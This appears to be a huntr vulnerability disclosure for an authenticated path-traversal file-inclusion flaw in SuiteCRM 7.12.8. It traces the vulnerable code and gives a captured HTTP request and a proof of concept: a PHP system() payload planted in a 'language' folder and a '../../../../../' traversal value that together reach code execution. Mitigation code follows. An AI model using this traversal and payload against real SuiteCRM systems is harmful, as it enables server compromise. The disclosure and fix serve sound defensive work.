huntr | Cr4ckc4t | 0C1365BC-8D9A-4AE0-8B55-615D492B3730
History: Nov 29, 2022 - 2:06 p.m.

Limited LFI via Path Traversal

2022-11-29 14:06:33
cr4ckc4t
www.huntr.dev
Tags: suitecrm, lfi, path traversal, php file, user authentication, remote attackers, remote code execution, proof of concept, vulnerability

EPSS: 0.001

Percentile: 38.0%

Description

A path traversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a PHP file at an arbitrary path via unsanitized request parameters.

Details

In Suite CRM v7.12.8, SubpanelCreates.php and SubpanelEdit.php pass unsanitized user input through to a require that loads a .php file. At least a low-privilege authenticated user is required to trigger the vulnerability.

// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422
// $module is still the user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268
// $module is still the user input
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
    global $mod_strings;

    require $cachedfile;
[...]

Proof of Concept

1 - Log in to SuiteCRM (a normal user with default permissions is enough - the PoC requires the user to create a “Call”)

2 - Navigate to “Calls” - “Create Call” - fill in a subject - “Save”

3 - Now select “Create Note or Attachment” from the “Notes” tab

4 - Intercept the outgoing request - it looks like this:

POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close

target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment

We can now modify the target_module parameter to point to an arbitrary location.

Combined with any sort of file upload (e.g. FTP), this may turn into RCE. In a location that’s accessible by the webserver:

# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php

Replace target_module with ../../../../../home/dummy/Documents and forward the request. The file i-was-here.txt is now in the web-root.

Mitigation

Sanitize the user input, for example by removing the characters . and / from it.
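The path construction traced under Details and the mitigation above, as an added example that is not SuiteCRM's own code: a stand-in for the module-language lookup in its vulnerable shape beside a hardened version that rejects . and / through an identifier allow-list, checks the module against a list of known modules, and confirms the resolved path still lies under the cache root before it is handed to require. The cache root, the module list and the function names are assumptions made for the example.

```php
<?php
// Added example, not SuiteCRM code. CACHE_ROOT, KNOWN_MODULES and the two
// functions below are hypothetical stand-ins for sugar_cached('modules/')
// and LanguageManager::loadModuleLanguage().
declare(strict_types=1);

// Hypothetical cache root standing in for sugar_cached('modules/').
const CACHE_ROOT = '/var/www/html/cache/modules';

// Hypothetical allow-list; the real application keeps its module list elsewhere.
const KNOWN_MODULES = ['Notes', 'Calls', 'Contacts', 'Accounts'];

// Vulnerable shape: the request value is spliced straight into the path,
// so "../" sequences walk out of the cache directory.
function vulnerableLanguageFile(string $module, string $lang): string
{
    return CACHE_ROOT . '/' . $module . '/language/' . $lang . '.lang.php';
}

/**
 * Hardened lookup. Returns the language file path only when both names are
 * well-formed identifiers, the module is known, and the resolved path is
 * inside the cache root; returns null in every other case.
 */
function safeLanguageFile(string $module, string $lang): ?string
{
    // 1. Syntactic allow-list: letters, digits and underscores only, so
    //    "." and "/" never reach the path at all.
    $ident = '/^[A-Za-z0-9_]+$/';
    if (!preg_match($ident, $module) || !preg_match($ident, $lang)) {
        return null;
    }

    // 2. Semantic allow-list: only modules the application actually knows.
    if (!in_array($module, KNOWN_MODULES, true)) {
        return null;
    }

    $candidate = CACHE_ROOT . '/' . $module . '/language/' . $lang . '.lang.php';

    // 3. Containment check: realpath() collapses ".." and symlinks; the result
    //    must start with the cache root. realpath() returns false for a
    //    missing file, which matches the original file_exists() gate.
    $root = realpath(CACHE_ROOT);
    $real = realpath($candidate);
    if ($root === false || $real === false) {
        return null;
    }
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed input mirroring the traversal value used in the report.
$traversal = '../../../../../home/dummy/Documents';

// The vulnerable builder happily produces a path outside CACHE_ROOT.
echo 'vulnerable: ' . vulnerableLanguageFile($traversal, 'en_us') . PHP_EOL;

// The hardened lookup rejects it at step 1 and returns null.
var_dump(safeLanguageFile($traversal, 'en_us'));

// A legitimate module name passes steps 1 and 2 and yields a path only if
// the cached language file actually exists under CACHE_ROOT.
var_dump(safeLanguageFile('Notes', 'en_us'));
```

Stripping . and / as the mitigation suggests closes this particular traversal, but an allow-list of known module names is the more robust fix because it also rejects any other unexpected value, and the realpath containment check catches cases where a later code path reintroduces user-controlled segments.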

Notes

Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines, however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.
